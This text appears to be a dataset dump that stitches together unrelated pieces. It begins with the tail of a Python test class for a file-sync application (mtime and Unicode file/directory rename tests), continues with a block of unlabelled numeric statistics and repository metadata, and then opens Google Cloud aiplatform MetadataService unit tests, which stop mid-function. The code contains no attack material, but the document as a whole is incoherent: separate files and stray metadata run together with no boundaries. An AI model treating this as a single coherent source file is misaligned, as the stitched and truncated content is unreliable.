self.assertTrue(self.app.is_alive(), "Test application is not running")
def test_update_mtime(self):
"""
update mtime of a file in both local folders
"""
logging.info("Launching test_update_mtime test")
self.assertTrue(self.app.is_alive(), "Test application is not running")
self.app.change_folders();
in_file = os.path.join(self.app.local_folder_in, "mtime_test")
out_file = os.path.join(self.app.local_folder_out, "mtime_test")
for _ in range(self.nr_time_changes):
logging.debug("Touching: %s" % in_file)
now = math.floor(time.time()) #floor to get seconds
with open(in_file, 'a'):
os.utime(in_file, (now, now))
# with open(out_file, 'a'):
# os.utime(in_file, (now, now))
atime=0
mtime=0
for r in range(self.app.nr_retries):
self.app.attempt=r
try:
mtime = os.path.getmtime(out_file)
except OSError:
pass
try:
atime = os.path.getatime(out_file)
except OSError:
pass
logging.debug("Comparing time: %s. atime: %d = %d, mtime: %d = %d" % (out_file, now, atime, now, mtime))
if (mtime==now): #all good
break;
self.app.sync()
logging.debug("Comparing time for %s failed! Retrying [%d/%d] .." % (out_file, r + 1, self.nr_retries))
#self.assertEqual(atime, now, "atime values are different")
self.assertEqual(mtime, now, "mtime values are different")
self.assertTrue(self.app.is_alive(), "Test application is not running")
def test_create_rename_delete_unicode_files_dirs(self):
"""
create directories with different amount of files,
using Unicode encoding for files / directories names,
compare directories on both sync folders,
rename directories
compare directories on both sync folders,
remove directories, check that directories removed from the second folder
"""
logging.info("Launching test_create_rename_delete_unicode_files_dirs test")
self.assertTrue(self.app.is_alive(), "Test application is not running")
self.app.change_folders();
# make sure remote folders are empty
self.assertTrue(self.dirs_check_empty(), "Checking if remote folders are empty")
self.assertTrue(self.app.is_alive(), "Test application is not running")
# create files
l_files = self.files_create(generate_unicode_name)
self.assertIsNotNone(l_files, "Creating files")
self.assertTrue(self.app.is_alive(), "Test application is not running")
self.app.sync()
# comparing
self.assertTrue(self.files_check(l_files), "Comparing files")
self.assertTrue(self.app.is_alive(), "Test application is not running")
# renaming
self.assertTrue(self.files_rename(l_files, generate_unicode_name), "Renaming files")
self.assertTrue(self.app.is_alive(), "Test application is not running")
self.app.sync()
# comparing
self.assertTrue(self.files_check(l_files), "Comparing files")
self.assertTrue(self.app.is_alive(), "Test application is not running")
# remove files
self.assertTrue(self.files_remove(l_files), "Removing files")
self.assertTrue(self.app.is_alive(), "Test application is not running")
# make sure remote folders are empty
self.assertTrue(self.dirs_check_empty(), "Checking if remote folders are empty")
self.assertTrue(self.app.is_alive(), "Test application is not running")
# make sure remote folders are empty #TODO: why is this twice?
self.assertTrue(self.dirs_check_empty(), "Checking if remote folders are empty")
self.assertTrue(self.app.is_alive(), "Test application is not running")
# create dirs
l_dirs = self.dirs_create(generate_unicode_name)
self.assertIsNotNone(l_dirs, "Creating directories")
self.assertTrue(self.app.is_alive(), "Test application is not running")
self.app.sync()
# comparing
self.assertTrue(self.dirs_check(l_dirs), "Comparing directories")
self.assertTrue(self.app.is_alive(), "Test application is not running")
# rename dirs
self.assertTrue(self.dirs_rename(l_dirs, generate_unicode_name), "Rename directories")
self.assertTrue(self.app.is_alive(), "Test application is not running")
self.app.sync()
# comparing
self.assertTrue(self.dirs_check(l_dirs), "Comparing directories")
self.assertTrue(self.app.is_alive(), "Test application is not running")
# remove files
self.assertTrue(self.dirs_remove(l_dirs), "Removing directories")
self.assertTrue(self.app.is_alive(), "Test application is not running")
# make sure remote folders are empty
self.assertTrue(self.dirs_check_empty(), "Checking if remote folders are empty")
self.assertTrue(self.app.is_alive(), "Test application is not running")
return True
| 39.544794
| 150
| 0.643522
| 2,074
| 16,332
| 4.921408
| 0.108004
| 0.122073
| 0.156951
| 0.109043
| 0.802195
| 0.767415
| 0.763104
| 0.746644
| 0.729205
| 0.724209
| 0
| 0.003562
| 0.260776
| 16,332
| 412
| 151
| 39.640777
| 0.841879
| 0.172606
| 0
| 0.623188
| 0
| 0.004831
| 0.259288
| 0.014799
| 0
| 0
| 0
| 0.004854
| 0.47343
| 1
| 0.038647
| false
| 0.014493
| 0.038647
| 0
| 0.10628
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
8111d695103ccf4e263a59225cc3c831d4a8df03
| 427,702
|
py
|
Python
|
tests/unit/gapic/aiplatform_v1beta1/test_metadata_service.py
|
sararob/python-aiplatform
|
e64cd5588848a4dcd9117ff905e9569576541b69
|
[
"Apache-2.0"
] | null | null | null |
tests/unit/gapic/aiplatform_v1beta1/test_metadata_service.py
|
sararob/python-aiplatform
|
e64cd5588848a4dcd9117ff905e9569576541b69
|
[
"Apache-2.0"
] | null | null | null |
tests/unit/gapic/aiplatform_v1beta1/test_metadata_service.py
|
sararob/python-aiplatform
|
e64cd5588848a4dcd9117ff905e9569576541b69
|
[
"Apache-2.0"
] | null | null | null |
# -*- coding: utf-8 -*-
# Copyright 2022 Google LLC
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
#
import os
# try/except added for compatibility with python < 3.8
try:
from unittest import mock
from unittest.mock import AsyncMock
except ImportError:
import mock
import grpc
from grpc.experimental import aio
import math
import pytest
from proto.marshal.rules.dates import DurationRule, TimestampRule
from google.api_core import client_options
from google.api_core import exceptions as core_exceptions
from google.api_core import future
from google.api_core import gapic_v1
from google.api_core import grpc_helpers
from google.api_core import grpc_helpers_async
from google.api_core import operation
from google.api_core import operation_async # type: ignore
from google.api_core import operations_v1
from google.api_core import path_template
from google.auth import credentials as ga_credentials
from google.auth.exceptions import MutualTLSChannelError
from google.cloud.aiplatform_v1beta1.services.metadata_service import (
MetadataServiceAsyncClient,
)
from google.cloud.aiplatform_v1beta1.services.metadata_service import (
MetadataServiceClient,
)
from google.cloud.aiplatform_v1beta1.services.metadata_service import pagers
from google.cloud.aiplatform_v1beta1.services.metadata_service import transports
from google.cloud.aiplatform_v1beta1.types import artifact
from google.cloud.aiplatform_v1beta1.types import artifact as gca_artifact
from google.cloud.aiplatform_v1beta1.types import context
from google.cloud.aiplatform_v1beta1.types import context as gca_context
from google.cloud.aiplatform_v1beta1.types import encryption_spec
from google.cloud.aiplatform_v1beta1.types import event
from google.cloud.aiplatform_v1beta1.types import execution
from google.cloud.aiplatform_v1beta1.types import execution as gca_execution
from google.cloud.aiplatform_v1beta1.types import lineage_subgraph
from google.cloud.aiplatform_v1beta1.types import metadata_schema
from google.cloud.aiplatform_v1beta1.types import metadata_schema as gca_metadata_schema
from google.cloud.aiplatform_v1beta1.types import metadata_service
from google.cloud.aiplatform_v1beta1.types import metadata_store
from google.cloud.aiplatform_v1beta1.types import metadata_store as gca_metadata_store
from google.cloud.aiplatform_v1beta1.types import operation as gca_operation
from google.cloud.location import locations_pb2
from google.iam.v1 import iam_policy_pb2 # type: ignore
from google.iam.v1 import options_pb2 # type: ignore
from google.iam.v1 import policy_pb2 # type: ignore
from google.longrunning import operations_pb2
from google.oauth2 import service_account
from google.protobuf import field_mask_pb2 # type: ignore
from google.protobuf import struct_pb2 # type: ignore
from google.protobuf import timestamp_pb2 # type: ignore
import google.auth
def client_cert_source_callback():
return b"cert bytes", b"key bytes"
# If default endpoint is localhost, then default mtls endpoint will be the same.
# This method modifies the default endpoint so the client can produce a different
# mtls endpoint for endpoint testing purposes.
def modify_default_endpoint(client):
return (
"foo.googleapis.com"
if ("localhost" in client.DEFAULT_ENDPOINT)
else client.DEFAULT_ENDPOINT
)
def test__get_default_mtls_endpoint():
api_endpoint = "example.googleapis.com"
api_mtls_endpoint = "example.mtls.googleapis.com"
sandbox_endpoint = "example.sandbox.googleapis.com"
sandbox_mtls_endpoint = "example.mtls.sandbox.googleapis.com"
non_googleapi = "api.example.com"
assert MetadataServiceClient._get_default_mtls_endpoint(None) is None
assert (
MetadataServiceClient._get_default_mtls_endpoint(api_endpoint)
== api_mtls_endpoint
)
assert (
MetadataServiceClient._get_default_mtls_endpoint(api_mtls_endpoint)
== api_mtls_endpoint
)
assert (
MetadataServiceClient._get_default_mtls_endpoint(sandbox_endpoint)
== sandbox_mtls_endpoint
)
assert (
MetadataServiceClient._get_default_mtls_endpoint(sandbox_mtls_endpoint)
== sandbox_mtls_endpoint
)
assert (
MetadataServiceClient._get_default_mtls_endpoint(non_googleapi) == non_googleapi
)
@pytest.mark.parametrize(
"client_class,transport_name",
[
(MetadataServiceClient, "grpc"),
(MetadataServiceAsyncClient, "grpc_asyncio"),
],
)
def test_metadata_service_client_from_service_account_info(
client_class, transport_name
):
creds = ga_credentials.AnonymousCredentials()
with mock.patch.object(
service_account.Credentials, "from_service_account_info"
) as factory:
factory.return_value = creds
info = {"valid": True}
client = client_class.from_service_account_info(info, transport=transport_name)
assert client.transport._credentials == creds
assert isinstance(client, client_class)
assert client.transport._host == ("aiplatform.googleapis.com:443")
@pytest.mark.parametrize(
"transport_class,transport_name",
[
(transports.MetadataServiceGrpcTransport, "grpc"),
(transports.MetadataServiceGrpcAsyncIOTransport, "grpc_asyncio"),
],
)
def test_metadata_service_client_service_account_always_use_jwt(
transport_class, transport_name
):
with mock.patch.object(
service_account.Credentials, "with_always_use_jwt_access", create=True
) as use_jwt:
creds = service_account.Credentials(None, None, None)
transport = transport_class(credentials=creds, always_use_jwt_access=True)
use_jwt.assert_called_once_with(True)
with mock.patch.object(
service_account.Credentials, "with_always_use_jwt_access", create=True
) as use_jwt:
creds = service_account.Credentials(None, None, None)
transport = transport_class(credentials=creds, always_use_jwt_access=False)
use_jwt.assert_not_called()
@pytest.mark.parametrize(
"client_class,transport_name",
[
(MetadataServiceClient, "grpc"),
(MetadataServiceAsyncClient, "grpc_asyncio"),
],
)
def test_metadata_service_client_from_service_account_file(
client_class, transport_name
):
creds = ga_credentials.AnonymousCredentials()
with mock.patch.object(
service_account.Credentials, "from_service_account_file"
) as factory:
factory.return_value = creds
client = client_class.from_service_account_file(
"dummy/file/path.json", transport=transport_name
)
assert client.transport._credentials == creds
assert isinstance(client, client_class)
client = client_class.from_service_account_json(
"dummy/file/path.json", transport=transport_name
)
assert client.transport._credentials == creds
assert isinstance(client, client_class)
assert client.transport._host == ("aiplatform.googleapis.com:443")
def test_metadata_service_client_get_transport_class():
transport = MetadataServiceClient.get_transport_class()
available_transports = [
transports.MetadataServiceGrpcTransport,
]
assert transport in available_transports
transport = MetadataServiceClient.get_transport_class("grpc")
assert transport == transports.MetadataServiceGrpcTransport
@pytest.mark.parametrize(
"client_class,transport_class,transport_name",
[
(MetadataServiceClient, transports.MetadataServiceGrpcTransport, "grpc"),
(
MetadataServiceAsyncClient,
transports.MetadataServiceGrpcAsyncIOTransport,
"grpc_asyncio",
),
],
)
@mock.patch.object(
MetadataServiceClient,
"DEFAULT_ENDPOINT",
modify_default_endpoint(MetadataServiceClient),
)
@mock.patch.object(
MetadataServiceAsyncClient,
"DEFAULT_ENDPOINT",
modify_default_endpoint(MetadataServiceAsyncClient),
)
def test_metadata_service_client_client_options(
client_class, transport_class, transport_name
):
# Check that if channel is provided we won't create a new one.
with mock.patch.object(MetadataServiceClient, "get_transport_class") as gtc:
transport = transport_class(credentials=ga_credentials.AnonymousCredentials())
client = client_class(transport=transport)
gtc.assert_not_called()
# Check that if channel is provided via str we will create a new one.
with mock.patch.object(MetadataServiceClient, "get_transport_class") as gtc:
client = client_class(transport=transport_name)
gtc.assert_called()
# Check the case api_endpoint is provided.
options = client_options.ClientOptions(api_endpoint="squid.clam.whelk")
with mock.patch.object(transport_class, "__init__") as patched:
patched.return_value = None
client = client_class(transport=transport_name, client_options=options)
patched.assert_called_once_with(
credentials=None,
credentials_file=None,
host="squid.clam.whelk",
scopes=None,
client_cert_source_for_mtls=None,
quota_project_id=None,
client_info=transports.base.DEFAULT_CLIENT_INFO,
always_use_jwt_access=True,
)
# Check the case api_endpoint is not provided and GOOGLE_API_USE_MTLS_ENDPOINT is
# "never".
with mock.patch.dict(os.environ, {"GOOGLE_API_USE_MTLS_ENDPOINT": "never"}):
with mock.patch.object(transport_class, "__init__") as patched:
patched.return_value = None
client = client_class(transport=transport_name)
patched.assert_called_once_with(
credentials=None,
credentials_file=None,
host=client.DEFAULT_ENDPOINT,
scopes=None,
client_cert_source_for_mtls=None,
quota_project_id=None,
client_info=transports.base.DEFAULT_CLIENT_INFO,
always_use_jwt_access=True,
)
# Check the case api_endpoint is not provided and GOOGLE_API_USE_MTLS_ENDPOINT is
# "always".
with mock.patch.dict(os.environ, {"GOOGLE_API_USE_MTLS_ENDPOINT": "always"}):
with mock.patch.object(transport_class, "__init__") as patched:
patched.return_value = None
client = client_class(transport=transport_name)
patched.assert_called_once_with(
credentials=None,
credentials_file=None,
host=client.DEFAULT_MTLS_ENDPOINT,
scopes=None,
client_cert_source_for_mtls=None,
quota_project_id=None,
client_info=transports.base.DEFAULT_CLIENT_INFO,
always_use_jwt_access=True,
)
# Check the case api_endpoint is not provided and GOOGLE_API_USE_MTLS_ENDPOINT has
# unsupported value.
with mock.patch.dict(os.environ, {"GOOGLE_API_USE_MTLS_ENDPOINT": "Unsupported"}):
with pytest.raises(MutualTLSChannelError):
client = client_class(transport=transport_name)
# Check the case GOOGLE_API_USE_CLIENT_CERTIFICATE has unsupported value.
with mock.patch.dict(
os.environ, {"GOOGLE_API_USE_CLIENT_CERTIFICATE": "Unsupported"}
):
with pytest.raises(ValueError):
client = client_class(transport=transport_name)
# Check the case quota_project_id is provided
options = client_options.ClientOptions(quota_project_id="octopus")
with mock.patch.object(transport_class, "__init__") as patched:
patched.return_value = None
client = client_class(client_options=options, transport=transport_name)
patched.assert_called_once_with(
credentials=None,
credentials_file=None,
host=client.DEFAULT_ENDPOINT,
scopes=None,
client_cert_source_for_mtls=None,
quota_project_id="octopus",
client_info=transports.base.DEFAULT_CLIENT_INFO,
always_use_jwt_access=True,
)
@pytest.mark.parametrize(
"client_class,transport_class,transport_name,use_client_cert_env",
[
(
MetadataServiceClient,
transports.MetadataServiceGrpcTransport,
"grpc",
"true",
),
(
MetadataServiceAsyncClient,
transports.MetadataServiceGrpcAsyncIOTransport,
"grpc_asyncio",
"true",
),
(
MetadataServiceClient,
transports.MetadataServiceGrpcTransport,
"grpc",
"false",
),
(
MetadataServiceAsyncClient,
transports.MetadataServiceGrpcAsyncIOTransport,
"grpc_asyncio",
"false",
),
],
)
@mock.patch.object(
MetadataServiceClient,
"DEFAULT_ENDPOINT",
modify_default_endpoint(MetadataServiceClient),
)
@mock.patch.object(
MetadataServiceAsyncClient,
"DEFAULT_ENDPOINT",
modify_default_endpoint(MetadataServiceAsyncClient),
)
@mock.patch.dict(os.environ, {"GOOGLE_API_USE_MTLS_ENDPOINT": "auto"})
def test_metadata_service_client_mtls_env_auto(
client_class, transport_class, transport_name, use_client_cert_env
):
# This tests the endpoint autoswitch behavior. Endpoint is autoswitched to the default
# mtls endpoint, if GOOGLE_API_USE_CLIENT_CERTIFICATE is "true" and client cert exists.
# Check the case client_cert_source is provided. Whether client cert is used depends on
# GOOGLE_API_USE_CLIENT_CERTIFICATE value.
with mock.patch.dict(
os.environ, {"GOOGLE_API_USE_CLIENT_CERTIFICATE": use_client_cert_env}
):
options = client_options.ClientOptions(
client_cert_source=client_cert_source_callback
)
with mock.patch.object(transport_class, "__init__") as patched:
patched.return_value = None
client = client_class(client_options=options, transport=transport_name)
if use_client_cert_env == "false":
expected_client_cert_source = None
expected_host = client.DEFAULT_ENDPOINT
else:
expected_client_cert_source = client_cert_source_callback
expected_host = client.DEFAULT_MTLS_ENDPOINT
patched.assert_called_once_with(
credentials=None,
credentials_file=None,
host=expected_host,
scopes=None,
client_cert_source_for_mtls=expected_client_cert_source,
quota_project_id=None,
client_info=transports.base.DEFAULT_CLIENT_INFO,
always_use_jwt_access=True,
)
# Check the case ADC client cert is provided. Whether client cert is used depends on
# GOOGLE_API_USE_CLIENT_CERTIFICATE value.
with mock.patch.dict(
os.environ, {"GOOGLE_API_USE_CLIENT_CERTIFICATE": use_client_cert_env}
):
with mock.patch.object(transport_class, "__init__") as patched:
with mock.patch(
"google.auth.transport.mtls.has_default_client_cert_source",
return_value=True,
):
with mock.patch(
"google.auth.transport.mtls.default_client_cert_source",
return_value=client_cert_source_callback,
):
if use_client_cert_env == "false":
expected_host = client.DEFAULT_ENDPOINT
expected_client_cert_source = None
else:
expected_host = client.DEFAULT_MTLS_ENDPOINT
expected_client_cert_source = client_cert_source_callback
patched.return_value = None
client = client_class(transport=transport_name)
patched.assert_called_once_with(
credentials=None,
credentials_file=None,
host=expected_host,
scopes=None,
client_cert_source_for_mtls=expected_client_cert_source,
quota_project_id=None,
client_info=transports.base.DEFAULT_CLIENT_INFO,
always_use_jwt_access=True,
)
# Check the case client_cert_source and ADC client cert are not provided.
with mock.patch.dict(
os.environ, {"GOOGLE_API_USE_CLIENT_CERTIFICATE": use_client_cert_env}
):
with mock.patch.object(transport_class, "__init__") as patched:
with mock.patch(
"google.auth.transport.mtls.has_default_client_cert_source",
return_value=False,
):
patched.return_value = None
client = client_class(transport=transport_name)
patched.assert_called_once_with(
credentials=None,
credentials_file=None,
host=client.DEFAULT_ENDPOINT,
scopes=None,
client_cert_source_for_mtls=None,
quota_project_id=None,
client_info=transports.base.DEFAULT_CLIENT_INFO,
always_use_jwt_access=True,
)
@pytest.mark.parametrize(
"client_class", [MetadataServiceClient, MetadataServiceAsyncClient]
)
@mock.patch.object(
MetadataServiceClient,
"DEFAULT_ENDPOINT",
modify_default_endpoint(MetadataServiceClient),
)
@mock.patch.object(
MetadataServiceAsyncClient,
"DEFAULT_ENDPOINT",
modify_default_endpoint(MetadataServiceAsyncClient),
)
def test_metadata_service_client_get_mtls_endpoint_and_cert_source(client_class):
mock_client_cert_source = mock.Mock()
# Test the case GOOGLE_API_USE_CLIENT_CERTIFICATE is "true".
with mock.patch.dict(os.environ, {"GOOGLE_API_USE_CLIENT_CERTIFICATE": "true"}):
mock_api_endpoint = "foo"
options = client_options.ClientOptions(
client_cert_source=mock_client_cert_source, api_endpoint=mock_api_endpoint
)
api_endpoint, cert_source = client_class.get_mtls_endpoint_and_cert_source(
options
)
assert api_endpoint == mock_api_endpoint
assert cert_source == mock_client_cert_source
# Test the case GOOGLE_API_USE_CLIENT_CERTIFICATE is "false".
with mock.patch.dict(os.environ, {"GOOGLE_API_USE_CLIENT_CERTIFICATE": "false"}):
mock_client_cert_source = mock.Mock()
mock_api_endpoint = "foo"
options = client_options.ClientOptions(
client_cert_source=mock_client_cert_source, api_endpoint=mock_api_endpoint
)
api_endpoint, cert_source = client_class.get_mtls_endpoint_and_cert_source(
options
)
assert api_endpoint == mock_api_endpoint
assert cert_source is None
# Test the case GOOGLE_API_USE_MTLS_ENDPOINT is "never".
with mock.patch.dict(os.environ, {"GOOGLE_API_USE_MTLS_ENDPOINT": "never"}):
api_endpoint, cert_source = client_class.get_mtls_endpoint_and_cert_source()
assert api_endpoint == client_class.DEFAULT_ENDPOINT
assert cert_source is None
# Test the case GOOGLE_API_USE_MTLS_ENDPOINT is "always".
with mock.patch.dict(os.environ, {"GOOGLE_API_USE_MTLS_ENDPOINT": "always"}):
api_endpoint, cert_source = client_class.get_mtls_endpoint_and_cert_source()
assert api_endpoint == client_class.DEFAULT_MTLS_ENDPOINT
assert cert_source is None
# Test the case GOOGLE_API_USE_MTLS_ENDPOINT is "auto" and default cert doesn't exist.
with mock.patch.dict(os.environ, {"GOOGLE_API_USE_CLIENT_CERTIFICATE": "true"}):
with mock.patch(
"google.auth.transport.mtls.has_default_client_cert_source",
return_value=False,
):
api_endpoint, cert_source = client_class.get_mtls_endpoint_and_cert_source()
assert api_endpoint == client_class.DEFAULT_ENDPOINT
assert cert_source is None
# Test the case GOOGLE_API_USE_MTLS_ENDPOINT is "auto" and default cert exists.
with mock.patch.dict(os.environ, {"GOOGLE_API_USE_CLIENT_CERTIFICATE": "true"}):
with mock.patch(
"google.auth.transport.mtls.has_default_client_cert_source",
return_value=True,
):
with mock.patch(
"google.auth.transport.mtls.default_client_cert_source",
return_value=mock_client_cert_source,
):
(
api_endpoint,
cert_source,
) = client_class.get_mtls_endpoint_and_cert_source()
assert api_endpoint == client_class.DEFAULT_MTLS_ENDPOINT
assert cert_source == mock_client_cert_source
@pytest.mark.parametrize(
"client_class,transport_class,transport_name",
[
(MetadataServiceClient, transports.MetadataServiceGrpcTransport, "grpc"),
(
MetadataServiceAsyncClient,
transports.MetadataServiceGrpcAsyncIOTransport,
"grpc_asyncio",
),
],
)
def test_metadata_service_client_client_options_scopes(
client_class, transport_class, transport_name
):
# Check the case scopes are provided.
options = client_options.ClientOptions(
scopes=["1", "2"],
)
with mock.patch.object(transport_class, "__init__") as patched:
patched.return_value = None
client = client_class(client_options=options, transport=transport_name)
patched.assert_called_once_with(
credentials=None,
credentials_file=None,
host=client.DEFAULT_ENDPOINT,
scopes=["1", "2"],
client_cert_source_for_mtls=None,
quota_project_id=None,
client_info=transports.base.DEFAULT_CLIENT_INFO,
always_use_jwt_access=True,
)
@pytest.mark.parametrize(
"client_class,transport_class,transport_name,grpc_helpers",
[
(
MetadataServiceClient,
transports.MetadataServiceGrpcTransport,
"grpc",
grpc_helpers,
),
(
MetadataServiceAsyncClient,
transports.MetadataServiceGrpcAsyncIOTransport,
"grpc_asyncio",
grpc_helpers_async,
),
],
)
def test_metadata_service_client_client_options_credentials_file(
client_class, transport_class, transport_name, grpc_helpers
):
# Check the case credentials file is provided.
options = client_options.ClientOptions(credentials_file="credentials.json")
with mock.patch.object(transport_class, "__init__") as patched:
patched.return_value = None
client = client_class(client_options=options, transport=transport_name)
patched.assert_called_once_with(
credentials=None,
credentials_file="credentials.json",
host=client.DEFAULT_ENDPOINT,
scopes=None,
client_cert_source_for_mtls=None,
quota_project_id=None,
client_info=transports.base.DEFAULT_CLIENT_INFO,
always_use_jwt_access=True,
)
def test_metadata_service_client_client_options_from_dict():
with mock.patch(
"google.cloud.aiplatform_v1beta1.services.metadata_service.transports.MetadataServiceGrpcTransport.__init__"
) as grpc_transport:
grpc_transport.return_value = None
client = MetadataServiceClient(
client_options={"api_endpoint": "squid.clam.whelk"}
)
grpc_transport.assert_called_once_with(
credentials=None,
credentials_file=None,
host="squid.clam.whelk",
scopes=None,
client_cert_source_for_mtls=None,
quota_project_id=None,
client_info=transports.base.DEFAULT_CLIENT_INFO,
always_use_jwt_access=True,
)
@pytest.mark.parametrize(
"client_class,transport_class,transport_name,grpc_helpers",
[
(
MetadataServiceClient,
transports.MetadataServiceGrpcTransport,
"grpc",
grpc_helpers,
),
(
MetadataServiceAsyncClient,
transports.MetadataServiceGrpcAsyncIOTransport,
"grpc_asyncio",
grpc_helpers_async,
),
],
)
def test_metadata_service_client_create_channel_credentials_file(
client_class, transport_class, transport_name, grpc_helpers
):
# Check the case credentials file is provided.
options = client_options.ClientOptions(credentials_file="credentials.json")
with mock.patch.object(transport_class, "__init__") as patched:
patched.return_value = None
client = client_class(client_options=options, transport=transport_name)
patched.assert_called_once_with(
credentials=None,
credentials_file="credentials.json",
host=client.DEFAULT_ENDPOINT,
scopes=None,
client_cert_source_for_mtls=None,
quota_project_id=None,
client_info=transports.base.DEFAULT_CLIENT_INFO,
always_use_jwt_access=True,
)
# test that the credentials from file are saved and used as the credentials.
with mock.patch.object(
google.auth, "load_credentials_from_file", autospec=True
) as load_creds, mock.patch.object(
google.auth, "default", autospec=True
) as adc, mock.patch.object(
grpc_helpers, "create_channel"
) as create_channel:
creds = ga_credentials.AnonymousCredentials()
file_creds = ga_credentials.AnonymousCredentials()
load_creds.return_value = (file_creds, None)
adc.return_value = (creds, None)
client = client_class(client_options=options, transport=transport_name)
create_channel.assert_called_with(
"aiplatform.googleapis.com:443",
credentials=file_creds,
credentials_file=None,
quota_project_id=None,
default_scopes=("https://www.googleapis.com/auth/cloud-platform",),
scopes=None,
default_host="aiplatform.googleapis.com",
ssl_credentials=None,
options=[
("grpc.max_send_message_length", -1),
("grpc.max_receive_message_length", -1),
],
)
@pytest.mark.parametrize(
"request_type",
[
metadata_service.CreateMetadataStoreRequest,
dict,
],
)
def test_create_metadata_store(request_type, transport: str = "grpc"):
client = MetadataServiceClient(
credentials=ga_credentials.AnonymousCredentials(),
transport=transport,
)
# Everything is optional in proto3 as far as the runtime is concerned,
# and we are mocking out the actual API, so just send an empty request.
request = request_type()
# Mock the actual call within the gRPC stub, and fake the request.
with mock.patch.object(
type(client.transport.create_metadata_store), "__call__"
) as call:
# Designate an appropriate return value for the call.
call.return_value = operations_pb2.Operation(name="operations/spam")
response = client.create_metadata_store(request)
# Establish that the underlying gRPC stub method was called.
assert len(call.mock_calls) == 1
_, args, _ = call.mock_calls[0]
assert args[0] == metadata_service.CreateMetadataStoreRequest()
# Establish that the response is the type that we expect.
assert isinstance(response, future.Future)
def test_create_metadata_store_empty_call():
# This test is a coverage failsafe to make sure that totally empty calls,
# i.e. request == None and no flattened fields passed, work.
client = MetadataServiceClient(
credentials=ga_credentials.AnonymousCredentials(),
transport="grpc",
)
# Mock the actual call within the gRPC stub, and fake the request.
with mock.patch.object(
type(client.transport.create_metadata_store), "__call__"
) as call:
client.create_metadata_store()
call.assert_called()
_, args, _ = call.mock_calls[0]
assert args[0] == metadata_service.CreateMetadataStoreRequest()
@pytest.mark.asyncio
async def test_create_metadata_store_async(
transport: str = "grpc_asyncio",
request_type=metadata_service.CreateMetadataStoreRequest,
):
client = MetadataServiceAsyncClient(
credentials=ga_credentials.AnonymousCredentials(),
transport=transport,
)
# Everything is optional in proto3 as far as the runtime is concerned,
# and we are mocking out the actual API, so just send an empty request.
request = request_type()
# Mock the actual call within the gRPC stub, and fake the request.
with mock.patch.object(
type(client.transport.create_metadata_store), "__call__"
) as call:
# Designate an appropriate return value for the call.
call.return_value = grpc_helpers_async.FakeUnaryUnaryCall(
operations_pb2.Operation(name="operations/spam")
)
response = await client.create_metadata_store(request)
# Establish that the underlying gRPC stub method was called.
assert len(call.mock_calls)
_, args, _ = call.mock_calls[0]
assert args[0] == metadata_service.CreateMetadataStoreRequest()
# Establish that the response is the type that we expect.
assert isinstance(response, future.Future)
@pytest.mark.asyncio
async def test_create_metadata_store_async_from_dict():
await test_create_metadata_store_async(request_type=dict)
def test_create_metadata_store_field_headers():
client = MetadataServiceClient(
credentials=ga_credentials.AnonymousCredentials(),
)
# Any value that is part of the HTTP/1.1 URI should be sent as
# a field header. Set these to a non-empty value.
request = metadata_service.CreateMetadataStoreRequest()
request.parent = "parent_value"
# Mock the actual call within the gRPC stub, and fake the request.
with mock.patch.object(
type(client.transport.create_metadata_store), "__call__"
) as call:
call.return_value = operations_pb2.Operation(name="operations/op")
client.create_metadata_store(request)
# Establish that the underlying gRPC stub method was called.
assert len(call.mock_calls) == 1
_, args, _ = call.mock_calls[0]
assert args[0] == request
# Establish that the field header was sent.
_, _, kw = call.mock_calls[0]
assert (
"x-goog-request-params",
"parent=parent_value",
) in kw["metadata"]
@pytest.mark.asyncio
async def test_create_metadata_store_field_headers_async():
client = MetadataServiceAsyncClient(
credentials=ga_credentials.AnonymousCredentials(),
)
# Any value that is part of the HTTP/1.1 URI should be sent as
# a field header. Set these to a non-empty value.
request = metadata_service.CreateMetadataStoreRequest()
request.parent = "parent_value"
# Mock the actual call within the gRPC stub, and fake the request.
with mock.patch.object(
type(client.transport.create_metadata_store), "__call__"
) as call:
call.return_value = grpc_helpers_async.FakeUnaryUnaryCall(
operations_pb2.Operation(name="operations/op")
)
await client.create_metadata_store(request)
# Establish that the underlying gRPC stub method was called.
assert len(call.mock_calls)
_, args, _ = call.mock_calls[0]
assert args[0] == request
# Establish that the field header was sent.
_, _, kw = call.mock_calls[0]
assert (
"x-goog-request-params",
"parent=parent_value",
) in kw["metadata"]
def test_create_metadata_store_flattened():
client = MetadataServiceClient(
credentials=ga_credentials.AnonymousCredentials(),
)
# Mock the actual call within the gRPC stub, and fake the request.
with mock.patch.object(
type(client.transport.create_metadata_store), "__call__"
) as call:
# Designate an appropriate return value for the call.
call.return_value = operations_pb2.Operation(name="operations/op")
# Call the method with a truthy value for each flattened field,
# using the keyword arguments to the method.
client.create_metadata_store(
parent="parent_value",
metadata_store=gca_metadata_store.MetadataStore(name="name_value"),
metadata_store_id="metadata_store_id_value",
)
# Establish that the underlying call was made with the expected
# request object values.
assert len(call.mock_calls) == 1
_, args, _ = call.mock_calls[0]
arg = args[0].parent
mock_val = "parent_value"
assert arg == mock_val
arg = args[0].metadata_store
mock_val = gca_metadata_store.MetadataStore(name="name_value")
assert arg == mock_val
arg = args[0].metadata_store_id
mock_val = "metadata_store_id_value"
assert arg == mock_val
def test_create_metadata_store_flattened_error():
client = MetadataServiceClient(
credentials=ga_credentials.AnonymousCredentials(),
)
# Attempting to call a method with both a request object and flattened
# fields is an error.
with pytest.raises(ValueError):
client.create_metadata_store(
metadata_service.CreateMetadataStoreRequest(),
parent="parent_value",
metadata_store=gca_metadata_store.MetadataStore(name="name_value"),
metadata_store_id="metadata_store_id_value",
)
@pytest.mark.asyncio
async def test_create_metadata_store_flattened_async():
client = MetadataServiceAsyncClient(
credentials=ga_credentials.AnonymousCredentials(),
)
# Mock the actual call within the gRPC stub, and fake the request.
with mock.patch.object(
type(client.transport.create_metadata_store), "__call__"
) as call:
# Designate an appropriate return value for the call.
call.return_value = operations_pb2.Operation(name="operations/op")
